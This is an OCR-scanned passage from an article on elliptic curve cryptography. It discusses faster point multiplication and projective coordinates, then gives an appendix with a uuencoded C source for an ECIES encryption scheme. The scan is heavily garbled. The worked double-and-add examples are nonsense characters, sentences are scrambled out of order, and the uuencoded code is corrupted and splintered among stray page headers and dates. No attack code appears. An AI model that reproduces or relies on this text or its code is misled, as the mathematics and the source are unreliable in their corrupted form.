reader. 


3. Our double-and-add point multiplicator is very rudimentary. Better 
ones can do the "k * P" job in half the time. We just give the idea 
of a first improvement: 


Suppose we want to calculate 15 * P for a curve point P. The 
double-and-add algorithm does this in the following way: 


15:08 OPP ZS CD. OS EQS DS REE She GPS oot AD Yin She UB Yt Sa P 


This takes three point doublings and three point additions 
(calculations concerning ’o’ are not considered). 


We could compute 15 * P in a cleverer fashion: 
eS, Pe AG EP eB Se 2A DE DD Pe IP 


This takes four doublings plus a single addition; hence we may 
expect point multiplicators using this trick to be better 
performers than the standard double-and-add algorithm. In practice 
this trick can speed up the point multiplication by about 30%. 


See [NAF] for more information about this topic. 


4. In implementations the most time consuming field operation is 
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always the element inversion. 
and the point doubling routines requir 


32 


We saw that both the point addition 


field division each. 


There is a trick that reduces the amount 
* P" point multiplication to just one. 
curve point (x,y) as triple (X,Y,2Z) 
"projectiv representation all 


W 


on 


of divisions ina full "k 


The idea is to represent the 
where x 
field divisions can by deferred to 


X/Z, y Y/Z. In this 


the very end of the point multiplication, 


out in a single inversion. 


Different types of coordinate systems of 
are presented in [CoordSys]. 


A 
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cryptography. 
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[ B Appendix: Code 


S cat ecc.c.uue 

begin 644 ecc.c 

M+RH@"B‘@5&AI<R! P<F] G<FSM (& EM<&QE; 65N=’ , @=&AE ($5#2453 (’ !U8SFQI 
M8R!K97D@96YC<GEP=&EO; B! S8VAE; 64@8F%S960@; VX@=S&AE"B‘@3DE35"!" 
M, 38S (&5L; &EP=&EC (&-U<G9E (&3N9"!T:&406%1502!B;&]C:R!C:7!H97(N 
M(%1H92!C;V1E (’ =A<R!W<FET=&5N"B ‘*@87, @86X@86-C; VUP86YI; 65N="!F 
M;W(@86X@87) T:6-L92!P=6) L: 7-H960@: 6X@<&AR86-K(",V,R!IA;FO@:7,@ 
M<F5L96%S960@=&\* ("!T:&4@<’ 5B; &EC (&10; 61; BX**B\*"B-I; F-L=61E 
M(#QS=&11; GON: #X* (VEN8VQU9&4@/’ -T9SQI8BYH/@HC: 6YC;’5D92*\<W1R 
M: 6YG+F@*"B-1;F-L=61E (#OF8VYT; "YH/@HC: 6YC;’5D92 ‘\=6YI<W1D+Fe@* 
M"B-1; F-L=61E (#QS=&11; RYH/@HC: 6YC;’5D92‘\;F5T:6YE="] 1; BYH/@H* 
M(VLE9FEN92!-04-23RA!*2!D;R! [(SS[(’ T@=VAI; &4H, "D* (VIEOFEN92 ! - 
M24XH82P@8BD@*"AA*2 ‘\ ("AB*2*_ ("AA*2 °Z ("AB*2D* (VLEQFEN92! #25%2 
M4S) ) 3EOH<’ 1R*2!N=&]H; "@J*’51;GOS,E] T*BDH<’ 1R*2D* (VIEOSFEN92!) 
M3E0OROTA! 4E, H<’1R+"!V86PI ($U!0U) /*"*J*'51;G0S,E] T*BDH<’ 1R*2°] 
M(&AT;VYL*’ 9A; "D@*0H* (VIEIFEN92!$159?4D%$.15]—-(" (O9&5V+W5R86YD 
M; VIB" @HC9&5F: 6YE($9!5S%,*’,1I (SU!OU) /*"!P97) R;W(H<RD[ (&5X: 70H 
M, C4U*2 ‘I"@HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ* BHJ*BHJ* BHJ* BHJ* BHI 
M*BHJ*BHJ* BHJ* BHJ* BHJ* BHJ* BHJ* BHUJ * BHUJ * BHJ * BHJ * BHD * BHD * BHJ + PH* 
M (V1IEQFEN92!514=2144@, 38S ("*@("@ (MA ("A(T @ (TA ("A ("\T (1 1A 
M92 !D96=R964@; V8@=&AE (&9196QD (’ !0;’ EN; VUI86P@*B\* (VIESFEN92 ! — 
M05) ’24X@,R*@("S@(MS@ (MA CMS@ (MSN (MSN (TSN (T SN (MES (MA (T A ("GE 
M("*@("\J (&10; B=T (7 10=6—-H (’ 1H: 7, @*B\* (VLIE9FEN92!.54U73U) $4R‘H 
M*$1%1U) $12 *K (SU! 4D=) 3B *K (#, Q*2 ‘0 (#, R* OH* ("*@+RH@=SAE (&90; &QO 
M=VENOR! T>7!E (’ =1; &P@<F5P<F5S96YT (&) I="!V96-T; W) S(&] F (&QE; F=T 
M:"*H1S5’ 4D5%*TU! 4D=) 3BD@*B\*=' EP961E9B!U: 6YT,S) ?="!B:71S=")? 
M=$M.54U73U) S4UT["@H@ ("*@("\d (' -O; 64@8F%S: 6, @8FET+6UA; FEP=60A 
M=&E0O;B!R;W5T: 6YE<R!T:&3T (&S$C="!0;B!T:&5892!V96-T;W) S (&90; &QO 
M=R ‘J+PHC9&5F: 6YE(&) I=’ -T<E]G971B: 70HO2PQ@: 61X*2 ‘H*S%; *&SED>"D@ 
M+R‘S,ET@/CX@*"AI9’ @I ("4@,S (1*2°F (#S5I"B-D9691; F4@8FET<WLR7W-E 
M=&)I="A!l+"!197@1I(SU!OU) /*"!!6RAT9’ @I("\@,S)=('P] (#S@/#PQ*"AI 
M9’ @I ("4@,S (I ("D* (VIE9FEN92!B:71S="') ?8VOR8FET*SSL (&ED>"D@343# 
M4D\H ($%; *&ED>"D@+R‘S, ET@) CT@?BRQ (#P\ ("@H: 61X*2 ‘BE (#,R*2D@*0H* 
M(VLE9FEN92!B:71S=" ) 28VQE87 (HO2D@34%#4D\H (&UE; 7-E={"A!4"°PH"!S 
M: 7IE; V8H8FET<WIR7WOI*2 ‘I"B-D9691; F4@8FET<WLR7V-O<’ DHO2P@0BDE@ 
M34%#4D\H (&UE; 6-P>2A!+"!"4"!S:71E; V8H8FET<WLR7WOI*2 ‘I"B-D969I 
M; F4@8FET<WIR7W-W87 ‘HO2P@0BD@34%#4D\H (&) I=’ -T<E] T(&@[ (SP* ("!B 
M:71S=' ) ?8V]P>2AH+"! !*3L@8FET<W1LR7V-O<’ DHO2P@0BD[ (&) I=’ -T<E]C 
M;W!Y*S (L(&@I ("D* (VIEOFEN92!B:71S=' ) 2: 7-297%U8 6PHO2P@0BDGa*"S@ 
M; 65M8VUP*SSL(S (L(’ -I>F509BAB: 71S=" ) ?="DI*OH*: 6YT(&) I=’ -T<E] I 
M<U]C; &5A<BAC; VYS="!B:71S=’) 2="!X*OL["B‘*@:6YT(&D["B‘@9F]R*&D@ 
M/2°*P.R! I (#P@3E5-5T] 21%, @) B8@(2*JI>"LK.R!I*RLI.PH@ (’) E=’ 5R; BIT 
M(#T] ($Y535=/4D13.P1I]"@H@ (" sac" sac" sac" ‘@ (" ‘ac" sac" ‘a ( sac" ‘@ 
M("*‘O*B!ROTLU<FX@=&AE (&YU; 6) EXB!O9B!T:&4@:&EG: &5S="!0; FAM8FET 
M("L@, 2 ‘J+PI1I;GO@8FET<WIR7W-I>F51;F) I=’, H8V]N<WO@8FET<W1R7WO@ 
M>"D*>PH@ (&EN="!1.PH@(’51;G0S,E]T (&UA<VL["B‘@9F]R*’ @@*ST@3E5-— 
M5T]21%,L(&D@/2‘S,B‘JI($Y535=/4D13.R!1 (#X@,"*F)B‘A("HM+7@[ (&D@ 
M+3T@,S(1.PH@ (&EF ("AL*OH@ ("*@9F] R* &UA<VL@/2 ‘OQ (#P\ (#,0.R‘A("@d 
M>"°F (SUA<VLI.R!M87-K (#X*/2°O+"!1I+2TI.PH@(’) E=’5R;B!1I.PI]"@H@ 
M("*A(MA@CM™@CM™A@CMA| CMAN CMA| CMAN (MSN (TSN (T A(T S(T S(T EA (" 
M+RH@; &5F="US: &EF="!B>2 ‘G8V]U; GOG (&1LI9VET<R‘J+PIV; VED (&) I=’ -T 
M<E] L<VAI 9GOH8FET<W1R7WO0@02P@8V] N<WO@8FET<WLR7WOG@OBPG@: 6YT (&-O 
M=6YT*OI["B‘@: 6YT (&DL(&]F9G, @/2*T ("H@* &-O=6YT ("\@,S (1. PH@ (&UE 
M; 6UO=F4H*’ 90: 600*4S@*R!O9F9S+"!"4+"!S:71E; V8H8FET<WLR7WOL ("T@ 
M; VOF<RD["B‘@; 65M<V5T*SSL(#*L(&]F9G, 1. PH@ (&EF ("AC; WSN="‘E/2°S 
, BD@>PH@ ("*@9F]R*&DG/2! .54U73U) S4R‘M(#S[ (&D@/B*P.R!I+2TI"B*@ 
("*@(S%; :5T@/2 *HOS5MI72‘\/"!C;WSN="D@?" ‘HO5MI ("T@, 5T@/CXA*#,R 
("T@8V]U; GOI*3L* ("*@(S$%;,ST@/#P] (&-O=6YT.PH@ (’ T*?20H* ("*@("%@ 
(" yac" ‘acu ‘@ ay yac" Yac" yac" Yac" ‘acu ‘@ (" ‘acu ‘@ ey yacu ‘O*B‘H<FSW 


x 


-UUTEHOE 


~~ 


5 


z 


uM 


uM 
uM 


3.txt 


M*2!1;7 
M;W) T*& 
M;W(H>" 
M("L] (# 
M(" yac" 
MO7AP;W 
M8VAA<B 
M("L] 
M-"D* (" 
M(" Yac" 
M;G5 
M*G, 


M("!S<! 
M("*ac" 


M7WO@> 
M;B* 
M("*@ 
M8FE 
M."D@ 


(" 
<W 


M(' XI 
M*BHJ 
M*BHJ 
M("*ac" 
M96QE; 6 
M("*ac" 
M("HO"@ 
M96US97 


M("S] (# 
M("S@*G 
MO"!F:6 
M; &SM7W 


M*R!> ( 
M72!>/2 
M(" Yac" 
M"G90:6 
M; G-T (& 
M87-S97 
M*&) I= 


($Y¥535=/ 


Wed Apr 26 09:43:44 2017 


!0<G0@ 
) l=’ -TK<E] 
‘K/2! 
OI"B*@ 
*@("*@ 
)TV’ 
‘I<R 


P@ 


Ge 
bE 


‘@(SE.5#) 
‘@ c" ‘@ 


9G)O;2!A(& 
ella Gag 
.54U73U) S4RP@:2 
CM g22Ux 
("*@( 
10 (&S@8G 
8V]N<Wwo 
4D13+"!1 
#25324 
("*@("*@ 
L; "UT97)M: 6YA=65 


, 


W yac" ‘@ 


(#T@OTA! 


@8F 
(#T@, 


ac" *@ 


D(2D@ 


M(&9R;VTG@ 
"p@ 
(7 -T<G- 


>PH@ 
M+2‘T("H@ 
.PH@ (’ 
M, #AX (BP@ 
*BHJ 
*BHJ 


M96QD7V 


M(&90<BAI (#T@ 


"ITY*R 


L(&-0;G-T(&) I 
M54U73U) 


S4RP@:2 
)1I;GLF*’ 
‘@ (" ‘@ 
82!H 


*@*&OE 
1R7V-L96% 


. VA 
7B 


*&QE; 


*@ 
5N= 
*@ 


OHO2 * 


HC9&5F: 6YE 
1 (# 


‘1 (#* 
7L(" ( 
("s@("*e@("%@ 
97@@<W1 
8V]N<WO@8VAA<B * 
P; BAS+"*B, #$R, SO 
($Y¥535=/ 
R*’@I.PH 
("*@<W-C86YF*’ 
BYE (# 
T*("lF;W(H.R* 
+2UX* 3L* ("!RO7 
*BHJ*BHJ*BHJ*BH 
*BHJ*BHJ*BHJ*B 
("*@("O*B!IT: &1 
1, Q@*B\*"F5 
("s@("*@("*@("*@+RHE 
D7W-E 


(& 


T<E]T(’ 
[(sD@/"! 
E, #AX (BPG@ 
cn ‘@ 


U 


4D1 
@(’ @e 
7,L(" ( 
(ees 
<SL 
<FX@ 


@I.PH 


@ @ Fa 


*BHJ 


VU 
HJ 
ES (7 
2: 


=<"! 


L96 


U 


91960 


Eel 


I 


a 
ry 


wn 
s 


SI(’)E="5 
@ 


7; VYS="!E 


H@ 
R971U 


51 
0@>2D@ 


L[ 
D*"B 
‘@ (" 
E; él 
Q=" 


*@ 
*@ 


oc" 
=ece™ 

O@9FI 
5196 


27 


yee? 


U 
H@ (3T@ 
]G971 


M("!BE;° 


W VQ 
E"B*@ 


M1$5’ 4D 
M, #L@ 
M/CX@,S 
M*& (L(S$ 
M(& 
M>B 


M;B*J+P 
M7V-O<! 
M7V-L96 
M:7,Q*! 
M="') ?<V. 


: BTM* 0H@ 


5%. 


(" ‘@ 
SI. ("*@ 


131 


PH@ 
U) % 


["B*@?0I1 


22*\ (SY535=/ 
"GT*"B-D9691;F4@ 


(" 
(" 
7 


!Y* OL 


>2 


B:70 
("!B:71S=") 
!'T*RLI (’ 


( 


"!BoVI=(#T 


TEC? 
E;&0@ 


ee 


‘each sa(" se 
“ech s@("\d 
5L="AE; 


D [ ("HO"B*@ 


H>2P@, 


2?8VO!l 


Le" ‘@ 


8E 


12DI"B‘@("*@ 
EF ("AB:71S=') 29V5 
P@8BD 
M<wW0@96Q 


"@ 


By STEEL yac" 


P72*°‘\/#T 


8FE 


@, 


IV; VE 


I["B*@ 
DH=2P@ 
SR*&<I.P 
41*2!["B 


96Q) 
Sp 


EZ96EN8FET 


A<"AU+" 


M="' ) ?<W 
M('T*(" 
M=2P@=2 
M; &1?86 
M*BHJ*B 
M*BHJ*B 
M=&AE (S$ 
M87) E(/ 


B75] 


"B 


< 


‘@(& 
Pa: 
LDA 
HJ*B 
HJ*B 


)I="-T 


HJ*B 
HJ*B 


<E 


(& 


HJ*B 
HJ*B 


8 


) Y=&4@87) 
@L (&-O; G-T (&- 
‘) (#°T 


4B 


Aa 


ET92!A<G)A>2‘J+PIV;V 
ET<W1LR7WO 
#L@:2 * 
RAS+" *J+2UX* 3L* 20 
(" ‘O*rB 
*B\*=F]I9O"!B:71 
("!I;G0@: 
U73U) S4SL@: 


@I"GL* 
504 
*BTM>"D 


(" 


R: 6YG ("HO"F 
J<RD*>P 
-C< 
BK" 
«ST 
, HAX (B 
<R’ 
<R° 
; &5N.PI] "@HO*BHI 


*B 


+PH*=" 
1Y<&4@=V 
P;VOQY.R 
=6A 
=#$ 
>F509BAI 
; <SM7WO@> 


86 


4D13.R!I*RLI"B*@ ("‘J>BLK 
OFEE 


(" 
(& 


&5M7WOG@ 
["B*@96QE; 


5 


EP 96 


(&D@/"! 


,R24Y4*', 1, 


@>"D*>PH@ 
\ ($Y¥535=/ 


!E>’ !0<G0@ 


["GT* 
‘@ (" ‘@ 
IB: 71 
EN=" 


ED (&) 


S= 


SB8V1 
DI"B N 
@; &5N("\ 
P@>"D 
K/2!L96X 
K/2*X*0H 


H 


i 
@ 
- 
@ 

[ 
- 
@ 


ec 


HJ*BHJ 


1E 


*BHJ 


"D*>P 
(&9O0<BAI (#T@, 3L@:2 
<FX@ 


("@ 
E(’)E 
HO2 
E; &SM7WOT 
H@ 


]/2! 


1D:711;Vx@ 


[7] 


&12?861 


*e@c™*@("*@ 
9196Q 
>BP@8V 
]T(&(["B*@ 


8E 


"DI"B ‘@ 
E87 (H 
(&90<BAJ 
Q*&);:E 
3L* (" ‘@ 


ET<Wl 


IB: 71 
["B*@ 


(ey 
>BD 


9OB!B: 
7"!ROT!ROT-E; 


9’ 5C=& 
3434 


(&EN="!I.PH@ 
*\ ($Y535=/4D13 
.54U73U) $4SL 
HL (&-O; G-T (&5L96U?="!X+" 
&EN="!1.P 


D 


D (&UU; 
N<W0@960] 


34 


R87D@*B\*=F]19"!B:71S= 
H87(@*G, I"GL* ("!1;G0@: 
.54U73U) $48 
W ‘@ 
H@* 


PI] "@H@ ( 


(" yac" yac" ‘acu ‘@ (" Yac" Y@+ 


')?:6UP 
3L* ("IF 
:2LK+t"!S 


@ 


(" ‘acu ‘@ 
’) A=RD@ 


I=!-T< 
(GEN="!1. 
4D13.R!I* 


H*("*@("*@("*@ 
87,@:&5X(" 
")2?=&)]?:&5X*6- 
'F;W(H 
IS ("L 


3L 
2L 
"BG ( 
(7G ( 


xc" 
K+" 
WXQ 
"XQ 


=') ?<&%&R<V4H 
L96X["B*@: 
E9DS"0T1% 


("!R971U 


"B ‘@ 
)2*X.PH@ 
(" ‘@ 


GES 


*BHJ 


*BHJ*BHd 


JE 


>’ !0<GOH 


H@ 


(&90<BAX 


i(’,@*ST@ 


—T<FEN9R‘H 


(" ‘@ 
+RH@: 


68@ 
1B(172 
<FX@ 
.#L* ("!I9OB*H 
J>"**/CT@ 
("*@; 
<W-C86YF*’,L 
*BHJ 
*BHJ 
71S=')?="!E 


(" ‘acu ‘@ 


H87(@ 
>"AK/21, 
] (#F@I"B*@ 
(ma (n sg 
6UP;W)T 
8FET<W1R 
*"AS6VQ 
D@?’P 
+3S5["B° 
;&5N("4 
1S ( 
&5N("8 
Gua 
*BHI*BHd 
*BHJ*BHJ 
; &5M7WO[ 


GI 


* 


He ae @ 


= 


(" ‘@ (" ‘@ 
EO;B! 
AD\H($% 
("T@-"DG@ 


*B\*>PHG@ ( 


,2A!*2!-04-23RG@6@ 
(" vac" yac" Yac" ‘@ 
'LI<&QI8VST:6)]N(" 
BE, S)]T(’ 
L(&H 
R7V-O<’ DH8BP@>"D 
S= 


:6YT (&D 


') 28V] 


3 


7 
ec 
A 
ec 


DQ 


(& 


H@ (" ‘@ 


E5-5T]218%, 
/#PG@, 
EF ("AB:71 
SDO"AB+"!1B4"! 


2D@?2"*H8 


("!F:65 


EN=F5 
*@("\g 


(" 4L(’ 
‘@8F 


Lec" ‘@ 


DLMB*@ (MIB: TESS" )2; 
HL (7 HL 


@I.P 
HJI*B 
\*¥"B\ I (%1 


H@ (’ 


5#0R 


'A<FET: 


& 


UE=&EC+B! 


) E<’) 


M:7, 
M<75A;" 
M<GD* ( W 


@87-S=6 


E<V5N=&5 


UE 


OMT 


& 


Q 
oO 


U<G9 


*@8W5 


'T;R‘O("AT: 


& 


R=F5S*2X 


ES (71 


Gaon 


D ( 
T ( 
ES ( 
@0 


(&< 
ET<W1LR7V-O<’ 
H@ (& 91 96QD7W-E=#S$H 
‘@("!1 (#T@8F 
RAV*3 
!'V* 3L@8F!1 


ET<Wl 


(& 


, 


T*?0 
HI*BHI*B 
H92!F; VOL; W=1; F<@<F] 
%;&QI<'1I8R 
)Y¥(" !A:7) S ("AX+" 
E"B*@ 
H92!C87-E 


1(& 


@[ 
DH=BP@ 
>BD["B*@ 


R7W-I>F51 


D(A 


87 ‘HORPG 
P@=BP@:2D[ 


R="AE 


"B ‘@: . 


EF ("AI (#P@, 
ET<W1R7W-V 
] L<VAI9GOH: "F 


:69T*&@L 


(&9I196QD (& 
["B*@ 
["B*@ 
*"S@ 
=2D@ 
("*@ 
/2°M:3L 


6YT (&D 
<&]L>2 
=VAI; &4@ 


;F)I='’,H 


H* +RHJ*BHJ 


HJ*BHJ*BHJ 


DI 


] E9F9T8V 


@ 


EE; GO 


e 


)V(G(& 


*BHJ*BHd 


(&]F 


GO@ 
("*@ 
P; VOY; FI]M:6% 
7, 6T@ 
*0 
(& 


H* :6YT(&9 
EF ( 


OFEE; &0@ 
(" ‘@ (" ‘@ 


ar 


/2°Q.R!IM 
I 
K 
Be 


"@J>"L 
("8 
*20H*=F] 
'C;VYS="! 
H@ 


oH 


P>2AZ+"!1X*3 
OF] R*&D@/2°O.R!I( 
@+2°O.R!T( 
EMJ ("T@ 
=") ?9V5T 
P;VOY*31 
]A9&0H 


L9% 
; <SM7WOG 


(#T@*GQ@K 


O5LP 
("*@ 
HO 
@L (&-O 
+RH@ 
68@ 


* 


"B ‘@ 
"B ‘@: 


i 


P@ 


Li 


U 
Z@ 


>BP@ 


EN=F5 


U=& 
'C=7)V92IP;V 
(&5L96 


EN97, @ 
EN=",*(" ‘@ 
U?="X@ 
(&-O969F:6-1L96YT ("=A)R!I<R!E 
(&90<B!A; &P@3D 
ES (&=I=F5N ( 


E35"!B; 


E 


Leann DDO 


Ne} 
Hy 
5 
: 


HJ 
9&\@ 


270@ 


6YA 
&EN ("=C 


3.txt 


M; V5F9E]B)RX@("< 


Wed Apr 26 09:43:44 2017 


M("*@9FEE 


M8VQE87 (H 


>2D 
M: 6YT<R! T; V=E=&AEK<B * 
M("HO"G90: 60@ 


H8FSS95]X+"!B87-1 


M: 65L9S]A9&0H>"PQ>"F 


7 &12?861D*’ 


M7V 


E(’L* 


M(’DQ*2D* 


M,2P@>3SI1 
M("*‘@?0HG@ 
M861D*&$L 


M=6Q0T*&0L 


EN=F 5R="AC4 


["GT*"B ‘@ 


("*@("*@<&] I; G1?8V] 


(MQ ("°@:68 
H8FET<W1R7VI 


ES7V5Q0=6%L*’DQ+"!Y,BDI"@ 
PH) 96QS92 **"2 *@<&]1I;G1?<V5T7WI 


(" ‘@ CMe! 


82D["B*@("!F:65 
.(’DL(&S1I.PH@ (’T* ("!E; 
(" Me ce Lac ‘acu yacu ‘@ 
H>#SL (’DQ*2°2Z/2° 
<&]1;G1?861D*&5L96U?="!X, 2P@ 
M="!E; &5M7WO@># (L (&—O; G-T (&5L96U?="!Y,BD*>PH 
\STWIE<F\H># (L(’ DR*2D@>PH@("*@:68 
P>2AX, 2P@>3S$L('@ 


@*&)I='-T<E 


I<U]E<75A; "AX, 2 


E(! AMES 


(’DOQ+"!Y,BD["@EF:65 


(&,L(&,1.P 


M*&0L(&0 
M(&01.PH) 


(& (I. PH) 9F 
FEE; &12?; 751 
65L9%]A9&0 


M*3L* (" 


M<RAE>’ *T 
M+"! 9*3L* 


M*BHJ 


M9"D["@EF: 


M*BHJ*BHJ*B 
M*BHJ*BHJ*B 
M="!B87-E7V]R9&5R.P 
M: 6YT (&UU;’11<&Q 
M:&T@*B\*=F]I9"!P;V 
M<WO@97AP7WO@9T7A 
M; G1?<V5T7WIE<F\H6" 
(“TE Shes 2°47/2> 
("*@(G&EF ("AB: 71 
M: 6YT7VSD9"AB+" 194M IX4"1Y*3L% ("1 ]"B 
M+" !9*3L*270H*("*@("*@(™*A("%@ 
M87<@82!R86YD; VI@=FSL=64@) V5X<"<@=VET:"‘QO(#P] (&5X<"*\ (&X@*B\* 
M=F]19"!G971?<FSN9&]M7V5X<&] N96YT*&5X<% 
M8G5F6S0@*B! .54U73U) S4UT["B*@ 
M(&EF ("@H9FRG/2 


tH"! BX3L*"69196Q0 
H) 9FEE; &1?861 


HJ*BHJ*B 
HJ*BHJ*B 


P*0 


P@62D 


1B; &1?86l1 
L="AA+"!X,2 
H>3SL(’DQ+" 
("*@?0H@ ("*@?0H@ (’ T*?0 
HJ*BHJ*BHJ*B 
\*"G1Y<&5 
H* (" y@aq"s 
I8V%ST:6]N(’9 
EN=% ] M=6Q0T*&5L96 
I["B*@96QE;5]1 


D, 2AD*3] 
P@8RD["@EF:65 
JA*3L*"6) I=’-T< 
H* +RHJ*BHJ*BHd 
HJ* BHJ*BHJ*BHd 
ET<W1R7WO 
“a ("a (" 
I182!D;W5B; &4M8 6Y 
U2 


D968@8FI 
ac" ‘@ (" 


P.RITF2TI (7 


:6YT (&9Ht+" 
!O0<&5N*S1%35E] 204Y$3TTL 
M("*@("!6051!3"AS1592?4D%3.1S]-*3L* ("*@ 


*BHJ*BHJ*BHJ*BHJ*B 


HJ*BHJ*B 


E7WDI)PH@ ("!I< 


RIA(’!0:6YT(’1H 


L9%]M=6QT*&$L (&$L('@ 
E*B ("1 Be71S=") 2 
("°O*B!A9&0@=' =0(" 10 


H>#SL (/DQ*2 °K ("AX, BP 
E;5]T(’DQ+"! 
EF ("@A(‘! 


@*’ !O:6Y 


ESTWIE<F\ 


D 


U?P="!At"!B+"!C+"!D.PH) 9FE 
AYSOH8BPG>#SL(’ @R*¥3L*"69196QD 
UU; ’ OH8RP@8RP@82D ["@EF: 65L 
D*ROL(G0D.( kT x 
L*"69I96QD7V%D9"AX, 2PQ>#SL 
9% ]A9&0H82P 


<& 


$ 


ma 


M*B! .54U73U) S4SL@<B*K/2!S*0H@("*@("!I9B* 
M=68@*R!R+"*T ("H@3E5-5T] 21%, @+2!R*2D@/#TEC, 
MO4YS3TTI.PH@ ("‘@: 68@*&-L; W-E*& 9H 

M5E] 204YS3TTI.PH@ ("‘@8FET<WIR7VEM<&]R="A 
M; W(H<B*] (&) I=’ -T<E]S:71E: 6YB:71S*&) A<V5 
M($Y535=/4D13 ("H@, S([ (’ (K*RD *@("‘@8FE 
M(’ (I1.PH@ (’ T@=VAI; &4H8FET<WIR7VES7V-L96% 
M*BHJ*BHJ*BHJ* BHJ* BHJ* BHJ* BHJ*B 


*BHJ*BHO 
*BHJ*BHO 
@97AP7WO["@IE>’ !? 
Ge Yac" ‘@ ("\d (" 'O 
D+6%D9"!A; &=O<FE 
; &SM7WO@>2P 
T (S@L(%D["B*@: 6YT(&D["B* 
["B*@9F]R*&D@/2!B:71S=! ) ?<VEZ96E 
L*("*@(" 10: 6YT7V10=6) 
=') 29VST8FET*&5X<"P@:2DI"B*@("*@(" !0 

‘@<&]1;G1?8V]P>2AX+"! 
C™|aCM|(M | (MG (MA (NA ("\ 


T<W1LR7V-I 


'y,BD["B* 
P@>#(I*2! 


@(’ !0: 6YT7V10=6) L92AX 
H>#SL(’DQ*31 


Li 


M870@9V5N97) A=&5S (&$@; &SROVAR<! ) 1; 640; W) DIT (@9W) O=7'N("*@("°@ 
M("*@("*@ ("HO"@IE; &5M7W0@8V] E9F9?8BP@8F%S95]X+"!B87-E7WD ["@HC 
M9&5F:6YE(’ !0:6YT7VESTWIE<F\H>"P@>2D@*&) I=’ -T<E] T<U] C; &5A<BAX 
M*2°F)B!B:71S=" ) ?:7-?8VQE87 (H>2DI"B-D9691; F4@<&]1;G1?<V5T7WIE 
M<F\H>"P@>2D@34%#4D\H (&) I=’ -T<E] C; &5A<BAX* 3L@8FET<WIR7V-L96%R 
M*’DI("D* (VLIE9FEN92!P; VEN=%3]C;W!Y*’ @O+"!Y, 2P@># (L(’ DR*2!-04-2 
M3R@@8FET<W1IR7V-O<’ DH>#SL (/ @R*3L@7 ‘HG ("*@ aor acy ue yoy cua 
mM @ (MA (MA (MG (M*A("A("*@("1B: 71S=" ) 28V] P>2AY, 2P@>3 (I ("D* 
M"BY](MA|(MA|CMSN(MA|(M ACMA (MSA ("A ("\I 96-K (&EF (‘E>,B*K 
M(’@J>2*] (‘A>,R*K("IX7C (@*R!C; VOF9E] B(&AO; &1S ("HO"FEN="!1<U]P 
M; VEN=% ] 0; E] C=7) V92AC; VYS="!E; &5M7WO@>"PQ8V]N<WO@96Q0E;5]T(’DI 
M"GL* ("!E; &SM7WO@82P@8CL* ("! T9OB‘H<&]1;G1?:7-?>F5R; RAX+"!Y*2D* 
M("*@ (1) E=" 5R;B‘Q.PH@ (&9196QD7VUU; ’ 0H82PQ >"D["B‘@9FEE; &1? 
M; 7SL="AB+" !A+"1X*3L* ("!F: 65L9%]A9&0H82PQ 8BD["B‘@9FEE; &1? 
M8 61D*&$L (&$L(&-O969F7V (I. PH@ (&9196QD7VU 8BP@>2P@>2D["B*@ 
MOFEE; &12861D*&$L (&$L(& (I. PH@ (&9196QD7VU 8BP@>"P@>2D["B*@ 
M<F5T=7)N(&) I=’ -T<E] 1<U] E<75A; "AA+"!B*3L H*=F]19"!P;VEN=%]D 
M; W5B; &4H96QE;5]T(’ @L(&5L96U2="!¥*2*@("" C™@(™*@("\T(&10 
M=6) L92!T:&4@<&]1;GO0@*’ @L>2D@*B\*>PH@ (&EF ("@A(&) I=’ -T<EJI<U]C 
M; &5A<BAX*2D@>PH@ ("‘@960E; 5] T(&$["B‘Q("! ] 1; GOE<GOH82P@ 
M>"D["B*@("!F:65L9%3]M=60T*&SL(&SL(’DI.PH EE; &1?861D*é&SL 
M(&SL(" @I.PH@ ("‘@9FEE; &1?; 7SL="AY+" !X+"!X*3L* ("%@ (&9I96QD7VUU 
M; ‘ OH>"P@82P@82D ["B*@ ("!F: 65L9%] A9&0Q*&$ CGC ETB LE 


I.PH@ 


@>3 (1 
C;VYS 
OFO LT 
H>#S] 
@c" ty 
["@EI 


(cs 


GI 


xc" \Q 


Ss 


BE; &1? 


PH) 9FEE; &1 


E]C;W!Y*/ @Q+"!D 
*BHJ*BHd 
*BHJ*BHd 


2?861D 


@82Pe@ 


@8V]N 
@<é&]I 


N8FET 


(&90<BAR (#T@, #L@<B * 
H*’ , @/2!R96%SD*&9 
"D*"49!15$%,*S1 
yee cose aC MCR OC ce pats 3 
E>’ ‘L(&)U9BD["B*@("!F 


L92A8 


Y+"!8 
J(&1R 


T (&5X<"D*>PHE@ (&-H87 (@ 
R+"!S.PH@(&10('L 
2?4D1/3DQ9*2D@/"*P*0HG@ 


xc" ‘@ 


\ (#0@ 
H+"1B 
%5E]2 
r*S1% 


2;W)D97 (I ("T@, 3L@<B*\ 
L<F) I="AE>! °L 
R*&5X<"DI.PI] "@HO*BHI 
HJ*BHJI*BHJ*BHJ*BHI*BHI*BHI*BHI 
HJ*BHI*BHJ+PH*=F]19"!85$5!7VEN 


3.txt 


M(#T@OTA!4E, R24Y4 
M (#01 .PHG ( ET@ 
M4S) ) 3E0 "LQ 
M("*@("*@("%@ ‘@ 
M(&-I<&AE<B*d 
M82P@8V]N<wOoe@ 
M96QTS2*] (#!X. 
M,DE.5"AD87 
M/2*P.R!I( 
M-2 
M83L*("*@ 
M:UMS=6T@ 
M24Y4,D-( 
m(m|a ("| (" A ("°C 
M="!1;B!#5%(@; 6 
M=6$L (&EN="!$:71 


L@ 
P@,S([ 


("H@*ST@ 
/CX@, 3$@ 
05) 3*&1 


io 


M:71?:V5Y*'51;G0S,E 


IV;V 
EN=4, R7WO@*FLI"G 
4S-S<Y8CDL(’DL(’ 


D@*R!Z*2!>("AS=6TE@ 


Wed Apr 26 09:43:44 2017 


JT ("IK+"!C; VYS="!C:&SR("IKO7DI"GL* ("! 
#T@OTA! 4E,R24Y4 
"L@."D[(&M;,UT@/2! 
(MACHA (NG 
L;V- 
8VAAKB*J9&ST 


* &ME 
(2) 
,3(1.PI]"@H@("*@( 


>2°*K(#°1. 


ED (SA414%3?96YC: 


L* ( 


>B*] ($-(05)3,DE 
(&DK*RD@>PH@("*@ 
*R!IK6W-U; 2 *F ( 
*MAY (#P\ (#0@7B! Y ( 
2D["B *@?0HG ( 
RYT+"!Z*3L*? 
ae Ce Gaal ean Co 
PIV; VED (SA41 
R ( 


( 
7) 
* 

( 
+ 


;VYS="!C3&% 


M:ULT72P@8W1R(#T 
M(%A414%52?:6Y 


"!T;G0@ 
:RP@:V5Y*3L 


* 


( 


EOROTA!4E, 
"*@(SA414% 


3 
M ( 
- 
M("‘J9&ST82L 
M("*@("@ 
